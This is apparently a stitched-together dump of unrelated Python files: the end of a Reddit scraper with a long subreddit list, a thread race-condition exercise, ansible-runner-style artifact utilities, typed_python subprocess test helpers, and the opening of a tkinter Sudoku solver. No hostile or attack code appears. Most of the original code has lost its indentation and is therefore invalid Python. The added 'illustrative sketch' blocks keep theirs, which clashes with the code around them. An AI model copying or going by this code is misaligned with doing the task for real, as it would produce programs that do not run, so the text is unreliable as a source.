'LifeProTips','LinguisticsHumor','LongDistance','MachineLearning','Manufacturing','MathHelp','Meditation','NetworkingJobs','Neuropsychology','NoStupidQuestions',
'ObjectiveC','PCMasterRace','PLC','PhilosophyofScience','PhsychologicalTricks','PoliticalDiscussion','Polyamory','PrintedCircuitBoard','Progether',
'ProgrammerHumor','Proofreading','Python','RapeCounseling','RetailManagement','STEMdents','SWORDS','SWResources','SampleSize','SanctionedSuicide','Seduction',
'SiblingSupport','Statistics','SuicideWatch','Swift','SysadminJobs','TechNews','ThermalPerformance','Tinder','TinyCode','TowerOfBabel','TrueAskReddit',
'TrueReddit','Unix','VentureBiotech','WeMetOnline','Web_Development','WhatsTheWord','YoungJobs','academicpsychology','academicpublishing','accounting','advice',
'androiddev','translator','answers','asklinguistics','askmath','askphotography','askreddit','askscience','assistance','astronomy','audiology','autism','badcode',
'badlinguistics','beermoney','behavioralmedicine','behaviortherapy','bestof','bestofTLDR','bioengineering','biology','biotech','bodybuilding','bookquotes',
'books','breadboard','bugs','buildapc','business','careerguidance','cfd','changemyview','chemicalengineering','chipdesign','civilengineering','cloudcomputing',
'coding','coffeescript','cogneuro','cogneurocogsci','cognitivelinguistics','cogsci','compilers','complexsystems','compling','compression','compsci',
'computerforensics','computers','computerscience','conlangs','conspiracy','construction','cosmology','coursearea','cpp','cpp_questions','crypto','cryptography',
'cs50','csbooks','cscareerquestions','csharp','css','dae','dailyprogrammer','dailyscripts','darkinternet','dataisbeautiful','datamining','dementia','depression',
'diy','documentaries','dotnet','downsyndrome','dyslexia','economics','education','eebooks','electricalengineering','electronics','engineering',
'engineeringtechnology','entrepreneur','epidemiology','etymology','eurodiversity','everythingscience','evolution','evopsych','explainlikeimfive','favors',
'finance','financialindependence','findareddit','forhire','forth','freelance','freelanceUK','freelanceWriters','funny','gadgets','genetics','getdisciplined',
'getemployed','getmotivated','getting_over_it','goldredditsays','grammar','grammarwriting','graphic_design','hacking','hardware','history','holdmybeer',
'homeworkhelp','html','htmlbasics','humanism','hwstartups','hypotheticalsituation','iWantToLearn','ideasfortheadmins','illegaltorrents','improvevocab','india',
'ineedafavor','intel','intelligence','interview','inventions','iwantoutjobs','java','javaTIL','javacodegeeks','javahelp','javascript','jobbit','jobsearchhacks',
'jokes','jquery','languagetechnology','learnjava','learnjavascript','learnmath','learnprogramming','learnpython','lectures','lifehacks','linguistics','linux',
'linux4noobs','linuxquestions','literature','logic','machinelearning','marketing','masculism','math','mathbooks','mathematics','mathpsych','matlab',
'mechanicalengineering','medicine','meditation','mentalhealth','mentors','metalworking','microsoft','mmfb','motivation','movies','music','mysql','needadvice',
'networking','neuro','neurodiversity','neurophilosophy','neuropsychology','newproducts','news','newtoreddit','nonprofit_jobs','nootropics','obvious',
'occupationaltherapy','ocd','offmychest','opengl','osdev','parkrangers','perl','philosophy','philosophyofScience','philosophyofscience','php','physics','pics',
'politics','privacy','product_design','productivity','programbattles','programming','programmingbuddies','programmingchallenges','psychiatry','psychology',
'psychopharmacology','psychotherapy','psychscience','puzzles','python','quotes','rage','rational','reasonstolive','rehabtherapy','relationship_advice',
'relationships','resumes','riddles','robotics','ruby','saneorpsycho','schizophrenia','science','scientificresearch','self','selfhelp','selfimprovement','sex',
'shittyaskscience','shittyideas','shittyprogramming','showerthoughts','simpleliving','slp','socialism','socialmedia','socialskills','sociology','software',
'softwarearchitecture','softwaredevelopment','softwaregore','solotravel','space','specialed','startups','stopselfharm','suicidology','sysadmin','systems',
'talesfromtechsupport','technology','techsupport','teenagers','testimonials','themixednuts','thisismyjob','tipofmytongue','todayilearned','tr',
'translationstudies','travel','tutor','ultralight','undelete','undeleteShadow','undergraduateresearch','uniqueminds','visualbasic','web_programming','webdev',
'whatisthis','whatstheword','windows','windowsazure','womenEngineers','words','work','workonline','worldnews','writingprompts']#major list, Once a week
l=set()
for k in b:
l.add(k)
b=[]
for k in l:
b.append(k)
b.sort()
subs(b)
my.write('\nSUCCESS list_subreddits'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n\n')
#xcv=0
#for k in b:
# xcv=xcv+1
# print(str(xcv)+"\t\t"+k)
#list_subreddits()
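# --- Illustrative sketch, not part of the original script ---
# The make_soup* helpers above retry forever on any exception, which can spin
# silently if a URL is permanently broken. A bounded-retry variant with a
# timeout and simple backoff could look like the following; the attempt count
# and backoff values are arbitrary choices for illustration, and the function
# is not wired into the scraper.
def fetch_with_retries(url, attempts=3, backoff_seconds=2, timeout=5):
    """Try a GET a few times; return the response text or None on failure."""
    for attempt in range(1, attempts + 1):
        try:
            response = requests.get(url, timeout=timeout)
            response.raise_for_status()
            return response.text
        except requests.exceptions.RequestException as exc:
            my.write('retry ' + str(attempt) + '/' + str(attempts) + ' for ' + url + ' failed: ' + str(exc) + '\n')
            time.sleep(backoff_seconds * attempt)
    return None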
if __name__ == "__main__":
processes = []
arguments = sys.argv[2:]#it was b
for x in arguments:
print(x)
p = multiprocessing.Process(target=main, args=(str(x),int(sys.argv[1]), ))
p.start()
processes.append(p)
for p in processes:
p.join()
# my.close()
|
foo.py
|
# Python 3.3.3 and 2.7.6
# python foo.py
from threading import Thread
# Potentially useful thing:
# In Python, a function that assigns to a module-level variable must declare it
# with the `global` keyword; otherwise the assignment creates a new local name.
i = 0
def incrementingFunction():
global i
    # Increment i 1,000,000 times (each i += 1 is a non-atomic read-modify-write)
for babb in range(0,1000000):
i+=1
def decrementingFunction():
global i
    # Decrement i 1,000,000 times
for babb in range(0,1000000):
i-=1
def main():
    # Read the shared module-level counter i after both threads finish
global i
incrementing = Thread(target = incrementingFunction, args = (),)
decrementing = Thread(target = decrementingFunction, args = (),)
    # Start both threads, then wait for them to finish
incrementing.start()
decrementing.start()
incrementing.join()
decrementing.join()
print("The magic number is %d" % (i))
main()
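# --- Illustrative sketch, not part of the original exercise ---
# The program above is a deliberate data race: i += 1 and i -= 1 each compile
# to a read-modify-write, so the printed "magic number" is usually not 0. One
# conventional fix, shown here only as an example (Python 3 syntax), is to
# guard the shared counter with a Lock.
def locked_counter_demo(iterations=1000000):
    """Increment and decrement a shared counter under a Lock; returns 0."""
    from threading import Lock
    counter = 0
    lock = Lock()
    def increment():
        nonlocal counter
        for _ in range(iterations):
            with lock:
                counter += 1
    def decrement():
        nonlocal counter
        for _ in range(iterations):
            with lock:
                counter -= 1
    threads = [Thread(target=increment), Thread(target=decrement)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return counter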
|
utils.py
|
import json
import sys
import re
import os
import stat
import fcntl
import shutil
import hashlib
import tempfile
import subprocess
import base64
import threading
import pipes
import uuid
import codecs
import zipfile
try:
from collections.abc import Iterable, Mapping
except ImportError:
from collections import Iterable, Mapping
from io import BytesIO, StringIO
from six import string_types, PY2, PY3, text_type, binary_type
class Bunch(object):
'''
Collect a bunch of variables together in an object.
This is a slight modification of Alex Martelli's and Doug Hudgeon's Bunch pattern.
'''
def __init__(self, **kwargs):
self.update(**kwargs)
def update(self, **kwargs):
self.__dict__.update(kwargs)
def get(self, key):
return self.__dict__.get(key)
def isplaybook(obj):
'''
Inspects the object and returns if it is a playbook
Args:
obj (object): The object to be inspected by this function
Returns:
boolean: True if the object is a list and False if it is not
'''
return isinstance(obj, Iterable) and (not isinstance(obj, string_types) and not isinstance(obj, Mapping))
def isinventory(obj):
'''
Inspects the object and returns if it is an inventory
Args:
obj (object): The object to be inspected by this function
Returns:
boolean: True if the object is an inventory dict and False if it is not
'''
return isinstance(obj, Mapping) or isinstance(obj, string_types)
def check_isolation_executable_installed(isolation_executable):
'''
Check that process isolation executable (e.g. podman, docker, bwrap) is installed.
'''
cmd = [isolation_executable, '--version']
try:
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
proc.communicate()
return bool(proc.returncode == 0)
except (OSError, ValueError) as e:
if isinstance(e, ValueError) or getattr(e, 'errno', 1) != 2: # ENOENT, no such file or directory
raise RuntimeError(f'{isolation_executable} unavailable for unexpected reason.')
return False
def stream_dir(directory):
buf = BytesIO()
with zipfile.ZipFile(buf, 'w', compression=zipfile.ZIP_DEFLATED, allowZip64=True) as archive:
if directory:
for dirpath, dirs, files in os.walk(directory):
relpath = os.path.relpath(dirpath, directory)
if relpath == ".":
relpath = ""
for fname in files:
archive.write(os.path.join(dirpath, fname), arcname=os.path.join(relpath, fname))
archive.close()
payload = buf.getvalue()
return b'\n'.join((json.dumps({'zipfile': len(payload)}).encode('utf-8'), payload))
def unstream_dir(data, directory):
buf = BytesIO(data)
with zipfile.ZipFile(buf, 'r') as archive:
# Fancy extraction in order to preserve permissions
# https://www.burgundywall.com/post/preserving-file-perms-with-python-zipfile-module
for info in archive.infolist():
archive.extract(info.filename, path=directory)
out_path = os.path.join(directory, info.filename)
perm = info.external_attr >> 16
os.chmod(out_path, perm)
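# --- Illustrative sketch, not part of the original module ---
# stream_dir() emits a one-line JSON header ({"zipfile": <payload length>}), a
# newline, and then the raw zip bytes; unstream_dir() expects only the zip
# bytes. The helper below, added purely as an example, round-trips a throwaway
# directory through both functions.
def _demo_stream_roundtrip():
    """Zip a temp directory, then unpack it into a second temp directory."""
    src = tempfile.mkdtemp()
    dst = tempfile.mkdtemp()
    with open(os.path.join(src, 'hello.txt'), 'w') as f:
        f.write('hello')
    streamed = stream_dir(src)
    header, _, payload = streamed.partition(b'\n')
    assert json.loads(header)['zipfile'] == len(payload)
    unstream_dir(payload, dst)
    return os.path.exists(os.path.join(dst, 'hello.txt'))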
def dump_artifact(obj, path, filename=None):
'''
Write the artifact to disk at the specified path
Args:
obj (string): The string object to be dumped to disk in the specified
path. The artifact filename will be automatically created
path (string): The full path to the artifacts data directory.
filename (string, optional): The name of file to write the artifact to.
If the filename is not provided, then one will be generated.
Returns:
string: The full path filename for the artifact that was generated
'''
p_sha1 = None
if not os.path.exists(path):
os.makedirs(path, mode=0o700)
else:
p_sha1 = hashlib.sha1()
p_sha1.update(obj.encode(encoding='UTF-8'))
if filename is None:
fd, fn = tempfile.mkstemp(dir=path)
else:
fn = os.path.join(path, filename)
if os.path.exists(fn):
c_sha1 = hashlib.sha1()
with open(fn) as f:
contents = f.read()
c_sha1.update(contents.encode(encoding='UTF-8'))
if not os.path.exists(fn) or p_sha1.hexdigest() != c_sha1.hexdigest():
lock_fp = os.path.join(path, '.artifact_write_lock')
lock_fd = os.open(lock_fp, os.O_RDWR | os.O_CREAT, stat.S_IRUSR | stat.S_IWUSR)
fcntl.lockf(lock_fd, fcntl.LOCK_EX)
try:
with open(fn, 'w') as f:
os.chmod(fn, stat.S_IRUSR)
f.write(str(obj))
finally:
fcntl.lockf(lock_fd, fcntl.LOCK_UN)
os.close(lock_fd)
os.remove(lock_fp)
return fn
def cleanup_artifact_dir(path, num_keep=0):
# 0 disables artifact dir cleanup/rotation
if num_keep < 1:
return
all_paths = sorted([os.path.join(path, p) for p in os.listdir(path)],
key=lambda x: os.path.getmtime(x))
total_remove = len(all_paths) - num_keep
for f in range(total_remove):
shutil.rmtree(all_paths[f])
def dump_artifacts(kwargs):
'''
Introspect the kwargs and dump objects to disk
'''
private_data_dir = kwargs.get('private_data_dir')
if not private_data_dir:
private_data_dir = tempfile.mkdtemp()
kwargs['private_data_dir'] = private_data_dir
if not os.path.exists(private_data_dir):
raise ValueError('private_data_dir path is either invalid or does not exist')
if 'role' in kwargs:
role = {'name': kwargs.pop('role')}
if 'role_vars' in kwargs:
role['vars'] = kwargs.pop('role_vars')
play = [{'hosts': kwargs.pop('hosts', 'all'), 'roles': [role]}]
if kwargs.pop('role_skip_facts', False):
play[0]['gather_facts'] = False
kwargs['playbook'] = play
if 'envvars' not in kwargs:
kwargs['envvars'] = {}
roles_path = kwargs.pop('roles_path', None)
if not roles_path:
roles_path = os.path.join(private_data_dir, 'roles')
else:
roles_path += ':{}'.format(os.path.join(private_data_dir, 'roles'))
kwargs['envvars']['ANSIBLE_ROLES_PATH'] = roles_path
obj = kwargs.get('playbook')
if obj and isplaybook(obj):
path = os.path.join(private_data_dir, 'project')
kwargs['playbook'] = dump_artifact(json.dumps(obj), path, 'main.json')
obj = kwargs.get('inventory')
if obj and isinventory(obj):
path = os.path.join(private_data_dir, 'inventory')
if isinstance(obj, Mapping):
kwargs['inventory'] = dump_artifact(json.dumps(obj), path, 'hosts.json')
elif isinstance(obj, string_types):
if not os.path.exists(obj):
kwargs['inventory'] = dump_artifact(obj, path, 'hosts')
for key in ('envvars', 'extravars', 'passwords', 'settings'):
obj = kwargs.get(key)
if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)):
path = os.path.join(private_data_dir, 'env')
dump_artifact(json.dumps(obj), path, key)
kwargs.pop(key)
for key in ('ssh_key', 'cmdline'):
obj = kwargs.get(key)
if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)):
path = os.path.join(private_data_dir, 'env')
dump_artifact(str(kwargs[key]), path, key)
kwargs.pop(key)
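# --- Illustrative sketch, not part of the original module ---
# dump_artifacts() rewrites a role-style kwargs dict in place: 'role'/'hosts'
# are folded into a generated playbook under project/main.json, and vars such
# as 'extravars' are written under env/. The values below are hypothetical
# placeholders chosen only to show the shape of the call.
def _demo_dump_role_kwargs():
    """Run dump_artifacts on a throwaway private_data_dir and show the result."""
    private_data_dir = tempfile.mkdtemp()
    kwargs = {
        'private_data_dir': private_data_dir,
        'role': 'example_role',            # hypothetical role name
        'hosts': 'all',
        'extravars': {'greeting': 'hello'},
    }
    dump_artifacts(kwargs)
    env_files = sorted(os.listdir(os.path.join(private_data_dir, 'env')))
    return kwargs['playbook'], env_files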
def collect_new_events(event_path,old_events):
'''
Collect new events for the 'events' generator property
'''
dir_events = os.listdir(event_path)
dir_events_actual = []
for each_file in dir_events:
if re.match("^[0-9]+-.+json$", each_file):
if '-partial' not in each_file and each_file not in old_events.keys() :
dir_events_actual.append(each_file)
dir_events_actual.sort(key=lambda filenm: int(filenm.split("-", 1)[0]))
for event_file in dir_events_actual:
with codecs.open(os.path.join(event_path, event_file), 'r', encoding='utf-8') as event_file_actual:
try:
event = json.load(event_file_actual)
except ValueError:
break
old_events[event_file] = True
yield event, old_events
class OutputEventFilter(object):
'''
File-like object that looks for encoded job events in stdout data.
'''
EVENT_DATA_RE = re.compile(r'\x1b\[K((?:[A-Za-z0-9+/=]+\x1b\[\d+D)+)\x1b\[K')
def __init__(self, handle, event_callback,
suppress_ansible_output=False, output_json=False):
self._event_callback = event_callback
self._counter = 0
self._start_line = 0
self._handle = handle
self._buffer = StringIO()
self._last_chunk = ''
self._current_event_data = None
self.output_json = output_json
self.suppress_ansible_output = suppress_ansible_output
def flush(self):
self._handle.flush()
def write(self, data):
self._buffer.write(data)
# keep a sliding window of the last chunk written so we can detect
# event tokens and determine if we need to perform a search of the full
# buffer
should_search = '\x1b[K' in (self._last_chunk + data)
self._last_chunk = data
# Only bother searching the buffer if we recently saw a start/end
# token (\x1b[K)
while should_search:
value = self._buffer.getvalue()
match = self.EVENT_DATA_RE.search(value)
if not match:
break
try:
base64_data = re.sub(r'\x1b\[\d+D', '', match.group(1))
event_data = json.loads(base64.b64decode(base64_data).decode('utf-8'))
except ValueError:
event_data = {}
event_data = self._emit_event(value[:match.start()], event_data)
if not self.output_json:
stdout_actual = event_data['stdout'] if 'stdout' in event_data else None
else:
stdout_actual = json.dumps(event_data)
remainder = value[match.end():]
self._buffer = StringIO()
self._buffer.write(remainder)
if stdout_actual and stdout_actual != "{}":
if not self.suppress_ansible_output:
sys.stdout.write(
stdout_actual.encode('utf-8') if PY2 else stdout_actual
)
sys.stdout.write("\n")
sys.stdout.flush()
self._handle.write(stdout_actual + "\n")
self._handle.flush()
self._last_chunk = remainder
else:
# Verbose stdout outside of event data context
if data and '\n' in data and self._current_event_data is None:
# emit events for all complete lines we know about
lines = self._buffer.getvalue().splitlines(True) # keep ends
remainder = None
# if last line is not a complete line, then exclude it
if '\n' not in lines[-1]:
remainder = lines.pop()
# emit all complete lines
for line in lines:
self._emit_event(line)
if not self.suppress_ansible_output:
sys.stdout.write(
line.encode('utf-8') if PY2 else line
)
self._handle.write(line)
self._handle.flush()
self._buffer = StringIO()
# put final partial line back on buffer
if remainder:
self._buffer.write(remainder)
def close(self):
value = self._buffer.getvalue()
if value:
self._emit_event(value)
self._buffer = StringIO()
self._event_callback(dict(event='EOF'))
self._handle.close()
def _emit_event(self, buffered_stdout, next_event_data=None):
next_event_data = next_event_data or {}
if self._current_event_data:
event_data = self._current_event_data
stdout_chunks = [buffered_stdout]
elif buffered_stdout:
event_data = dict(event='verbose')
stdout_chunks = buffered_stdout.splitlines(True)
else:
event_data = dict()
stdout_chunks = []
for stdout_chunk in stdout_chunks:
if event_data.get('event') == 'verbose':
event_data['uuid'] = str(uuid.uuid4())
self._counter += 1
event_data['counter'] = self._counter
event_data['stdout'] = stdout_chunk[:-2] if len(stdout_chunk) > 2 else ""
n_lines = stdout_chunk.count('\n')
event_data['start_line'] = self._start_line
event_data['end_line'] = self._start_line + n_lines
self._start_line += n_lines
if self._event_callback:
self._event_callback(event_data)
if next_event_data.get('uuid', None):
self._current_event_data = next_event_data
else:
self._current_event_data = None
return event_data
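# --- Illustrative sketch, not part of the original module ---
# EVENT_DATA_RE expects events encoded as: an \x1b[K marker, base64-encoded
# JSON broken up by \x1b[<n>D cursor moves, and a closing \x1b[K marker. The
# helper below builds one such token around a made-up event dict and runs it
# through OutputEventFilter to show the decoded callback payloads.
def _demo_event_token_roundtrip():
    """Encode a fake event the way the filter expects, then decode it."""
    event = {'uuid': 'demo-uuid', 'event': 'runner_on_ok'}  # hypothetical event
    b64 = base64.b64encode(json.dumps(event).encode('utf-8')).decode('ascii')
    token = '\x1b[K' + b64 + '\x1b[%dD' % (len(b64) + 1) + '\x1b[K'
    captured = []
    sink = StringIO()
    event_filter = OutputEventFilter(sink, captured.append, suppress_ansible_output=True)
    event_filter.write(token + 'task output line\n')
    event_filter.close()
    return captured  # the decoded event followed by the synthetic EOF event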
def open_fifo_write(path, data):
'''open_fifo_write opens the fifo named pipe in a new thread.
This blocks the thread until an external process (such as ssh-agent)
reads data from the pipe.
'''
os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)
threading.Thread(target=lambda p, d: open(p, 'wb').write(d),
args=(path, data)).start()
def args2cmdline(*args):
return ' '.join([pipes.quote(a) for a in args])
def ensure_str(s, encoding='utf-8', errors='strict'):
"""
Copied from six==1.12
Coerce *s* to `str`.
For Python 2:
- `unicode` -> encoded to `str`
- `str` -> `str`
For Python 3:
- `str` -> `str`
- `bytes` -> decoded to `str`
"""
if not isinstance(s, (text_type, binary_type)):
raise TypeError("not expecting type '%s'" % type(s))
if PY2 and isinstance(s, text_type):
s = s.encode(encoding, errors)
elif PY3 and isinstance(s, binary_type):
s = s.decode(encoding, errors)
return s
def sanitize_container_name(original_name):
"""
Docker and podman will only accept certain characters in container names
This takes a given name from user-specified values and replaces the
invalid characters so it can be used in docker/podman CLI commands
"""
return re.sub('[^a-zA-Z0-9_-]', '_', text_type(original_name))
|
test_util.py
|
# Copyright 2017-2020 typed_python Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import psutil
import time
import threading
import tempfile
import pickle
import subprocess
import sys
import os
from typed_python import Entrypoint, SerializationContext
def currentMemUsageMb(residentOnly=True):
if residentOnly:
return psutil.Process().memory_info().rss / 1024 ** 2
else:
return psutil.Process().memory_info().vms / 1024 ** 2
def compilerPerformanceComparison(f, *args, assertResultsEquivalent=True):
"""Call 'f' with args in entrypointed/unentrypointed form and benchmark
If 'assertResultsEquivalent' check that the two results are '=='.
Returns:
(elapsedCompiled, elapsedUncompiled)
"""
fEntrypointed = Entrypoint(f)
fEntrypointed(*args)
t0 = time.time()
compiledRes = fEntrypointed(*args)
t1 = time.time()
uncompiledRes = f(*args)
t2 = time.time()
if assertResultsEquivalent:
assert compiledRes == uncompiledRes, (compiledRes, uncompiledRes)
return (t1 - t0, t2 - t1)
def estimateFunctionMultithreadSlowdown(f, threadcount=2):
t0 = time.time()
f()
t1 = time.time()
threads = [threading.Thread(target=f) for _ in range(threadcount)]
for t in threads:
t.start()
for t in threads:
t.join()
t2 = time.time()
return (t2 - t1) / (t1 - t0)
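# --- Illustrative sketch, not part of the original test utilities ---
# estimateFunctionMultithreadSlowdown() times one threaded run against a
# single-threaded baseline; for pure-Python CPU-bound work the ratio tends to
# approach the thread count because of the GIL. The workload below is a
# made-up example, not something the surrounding test suite runs.
def _demo_multithread_slowdown():
    """Return the slowdown ratio for a small CPU-bound loop on two threads."""
    def spin():
        total = 0
        for i in range(2_000_000):
            total += i
        return total
    return estimateFunctionMultithreadSlowdown(spin, threadcount=2)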
def instantiateFiles(filesToWrite, tf):
"""Write out a dict of files to a temporary directory.
Args:
filesToWrite - a dict from filename to file contents. Don't try to use
subdirectories yet - it won't be cross platform.
tf - the temporary directory to write into
"""
for fname, contents in filesToWrite.items():
fullname = os.path.join(tf, fname)
dirname = os.path.dirname(fullname)
if not os.path.exists(dirname):
os.makedirs(dirname)
with open(fullname, "w") as f:
f.write(
"from typed_python import *\n"
+ contents
)
def callFunctionInFreshProcess(func, argTup, compilerCacheDir=None):
"""Return the value of a function evaluated on some arguments in a subprocess.
We use this to test the semantics of anonymous functions and classes in a process
    that didn't create those objects.
Args:
func - the function object to call
argTup - a tuple of arguments
Returns:
the result of the expression.
"""
with tempfile.TemporaryDirectory() as tf:
env = dict(os.environ)
if compilerCacheDir:
env["TP_COMPILER_CACHE"] = compilerCacheDir
sc = SerializationContext()
with open(os.path.join(tf, "input"), "wb") as f:
f.write(sc.serialize((func, argTup)))
try:
subprocess.check_output(
[
sys.executable,
"-u",
"-c",
"from typed_python import SerializationContext\n"
"sc = SerializationContext()\n"
"with open('input', 'rb') as f:\n"
" func, argTup = sc.deserialize(f.read())\n"
"with open('output', 'wb') as f:\n"
" f.write(sc.serialize(func(*argTup)))\n"
],
cwd=tf,
env=env,
stderr=subprocess.PIPE
)
except subprocess.CalledProcessError as e:
raise Exception("Subprocess failed:\n\n" + e.stdout.decode("ASCII") + "\n\nerr=\n" + e.stderr.decode("ASCII"))
with open(os.path.join(tf, "output"), "rb") as f:
result = sc.deserialize(f.read())
return result
def evaluateExprInFreshProcess(filesToWrite, expression, compilerCacheDir=None, printComments=False):
"""Return the value of an expression evaluated in a subprocess.
We use this to test using typed_python in codebases other than the main
typed_python codebase, so that we can see what happens when some code itself
changes underneath us.
The value of the expression must be picklable, and shouldn't depend on
any of the code in 'filesToWrite', since it won't make sense in the calling
module.
Args:
filesToWrite = a dictionary from filename to the actual file contents to write.
expression - the expression to evaluate. You should assume that we've imported
all the modules given in 'filesToWrite', as well as everything
from typed_python.
Returns:
the result of the expression.
Example:
evaluateExprInFreshProcess({'M.py': "x = 10"}, "M.x")
"""
with tempfile.TemporaryDirectory() as tf:
instantiateFiles(filesToWrite, tf)
namesToImport = [
fname[:-3].replace("/", ".") for fname in filesToWrite if '__init__' not in fname
]
env = dict(os.environ)
if compilerCacheDir:
env["TP_COMPILER_CACHE"] = compilerCacheDir
try:
output = subprocess.check_output(
[
sys.executable,
"-u",
"-c",
"".join(f"import {modname};" for modname in namesToImport) + (
f"import pickle;"
f"from typed_python._types import identityHash, recursiveTypeGroup;"
f"from typed_python import *;"
f"print(repr(pickle.dumps({expression})))"
)
],
cwd=tf,
env=env,
stderr=subprocess.PIPE
)
except subprocess.CalledProcessError as e:
raise Exception("Subprocess failed:\n\n" + e.stdout.decode("ASCII") + "\n\nerr=\n" + e.stderr.decode("ASCII"))
def isBytes(x):
return x.startswith(b"b'") or x.startswith(b'b"')
comments = [x for x in output.split(b"\n") if not isBytes(x) and x]
result = b'\n'.join([x for x in output.split(b"\n") if isBytes(x)])
if comments and printComments:
print("GOT COMMENTS:\n", "\n".join(["\t" + x.decode("ASCII") for x in comments]))
try:
# we're returning a 'repr' of a bytes object. the 'eval'
# turns it back into a python bytes object so we can compare it.
return pickle.loads(eval(result))
except Exception:
raise Exception("Failed to understand output:\n" + output.decode("ASCII"))
|
main.pyw
|
'''Sudoku Solver Main Module'''
import tkinter
from tkinter import ttk # Used for scrollbar
from tkinter import messagebox # Used for message boxes
from tkinter import filedialog # Used for opening the file dialog box
import copy # Used for creating copies of variables instead of instances
import threading # Multithreading module
import time # Time module for delays
import os # Module for opening system files
from sys import exit # Prevents .exe from crashing when exit function is used
import json # Module for opening json files
class GraphicalInterface:
'Creates the entire GUI'
def __init__(self, parent): # Parent is the main window
self.parent = parent # Parent root frame
self.solutions = [] # Stores all solved grids
self.empty_grid = [ # Empty grid used for resetting
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]
]
self.running = False # Sets the flag indicating whether the solver thread is running; needed for solver thread
self.modify = True # Sets the flag indicating whether the grid is allowed to be modified
self.autosave = tkinter.IntVar() # Sets value indicating whether to save grid automatically (1 or 0)
self.delay = tkinter.IntVar() # Sets value indicating whether to delay grid animation (1 or 0)
self.margin = 10 # Margin size of the sudoku board
self.side = 40 # Side length of each square in the grid
self.width = self.height = (self.margin*2) + (self.side*9) # Defines the width and height of the canvas
self.buttonfont = ('Helvetica', 7) # Font type of buttons
self.statusfont = ('Helvetica', 7) # Font type for the status bar
self.gridfont = ('Helvetica', 10, 'bold') # Font type of sudoku grid
self.row = None # Currently selected cell row and column
self.col = None
self.__widgets() # Initiates other widgets
self.__load_settings() # Loads old settings
### PACKING WIDGETS
def __widgets(self):
'Initiates the widgets'
### MENUBAR
self.menubar = tkinter.Menu(root) # Creates the menubar object
root.config(menu=self.menubar) # Sets menubar object in root
self.file_submenu = tkinter.Menu(self.menubar, tearoff=0) # Creates file submenu
self.menubar.add_cascade(label='File', menu=self.file_submenu) # Places submenu inside menubar
self.file_submenu.add_command(label='Load...', command=self.__load) # Adds load button
self.file_submenu.add_separator() # Adds a line separator
self.file_submenu.add_command(label='Save As...', state=tkinter.DISABLED, command=self.__save) # Adds save button which is disabled at the start
        self.file_submenu.add_checkbutton(label='Auto Save', variable=self.autosave, command=self.__save_settings) # Adds a checkbutton for autosave functionality bound to self.autosave
self.file_submenu.add_separator() # Adds a line separator
self.file_submenu.add_command(label='Exit', command=exit) # Adds exit button
self.option_submenu = tkinter.Menu(self.menubar, tearoff=0) # Creates options submenu
self.menubar.add_cascade(label='Options', menu=self.option_submenu) # Places the submenu inside the menubar
        self.option_submenu.add_checkbutton(label='Delay Animations', variable=self.delay, command=self.__save_settings) # Adds a checkbutton for delaying animations, bound to self.delay
self.help_submenu = tkinter.Menu(self.menubar, tearoff=0) # Creates help submenu
self.menubar.add_cascade(label='Help', menu=self.help_submenu) # Places the submenu inside the menubar
self.help_submenu.add_command(label='About Sudoku Solver', command=self.__about) # About button that opens README.md
self.help_submenu.add_separator() # Adds a line separator
self.help_submenu.add_command(label='Licence', command=self.__licence) # Licence button that opens LICENCE.md
### SCROLLBAR & STATUS BAR
self.scrollbar = tkinter.Scrollbar(root) # Scrollbar for the text widget
self.scrollbar.grid(row=0, column=2, sticky=tkinter.NS) # sticky parameter makes scrollbar stretch from top to bottom; added on right side of GUI
self.status_bar = tkinter.Label(root, text='Awaiting commands.', font=self.statusfont, bg='#171717', fg='white', anchor=tkinter.E) # Status bar for displaying various status updates
self.status_bar.grid(row=1, column=0, columnspan=3, sticky=tkinter.EW) # sticky parameter makes the label stretch from left to right; added at the bottom of the GUI
### LEFT FRAME (Contains Sudoku Grid)
self.left_frame = tkinter.Frame(self.parent, bg='#212121') # Left frame placed inside the root widget
self.canvas = tkinter.Canvas(self.left_frame, bg='#212121', width=self.width, height=self.height) # Sudoku grid canvas
self.left_frame.grid(row=0, column=0) # Positions the frame on the left of the GUI
self.canvas.grid(padx=(10,0))
### RIGHT FRAME (Contains solutions display grid and execution buttons)
self.right_frame = tkinter.Frame(self.parent, bg='#212121') # Right frame placed inside the root widget
self.solved_grids_display = tkinter.Text(self.right_frame, bg='#212121', height=21, width=30, state=tkinter.DISABLED, yscrollcommand=self.scrollbar.set) # Text widget displaying all the solved solutions
self.right_frame.grid(row=0, column=1) # Positions the frame on the right of the GUI
self.solved_grids_display.grid(row=0, column=0, padx=10, pady=(20,0))
###### RIGHT FRAME BUTTONS LABEL FRAME (Contains execution buttons)
self.buttons_label_frame = tkinter.LabelFrame(self.right_frame, text='Configure', font=self.statusfont, bg='#212121', fg='white') # Buttons sub frame inside right frame
self.start_btn = tkinter.Button(self.buttons_label_frame, text='Start', font=self.buttonfont, bg='#212121', fg='white', command=self.__start) # Start button
self.stop_btn = tkinter.Button(self.buttons_label_frame, text='Stop', font=self.buttonfont, bg='#212121', fg='white', state=tkinter.DISABLED, command=self.__stop) # Stop button
self.reset_btn = tkinter.Button(self.buttons_label_frame, text='Reset', font=self.buttonfont, bg='#212121', fg='white', state=tkinter.DISABLED, command=self.__reset) # Reset button
self.loading_bar = ttk.Progressbar(self.buttons_label_frame, orient=tkinter.HORIZONTAL, mode='indeterminate', maximum='20', length=150) # Indeterminate loading bar does not fill gradually but rather sweeps across
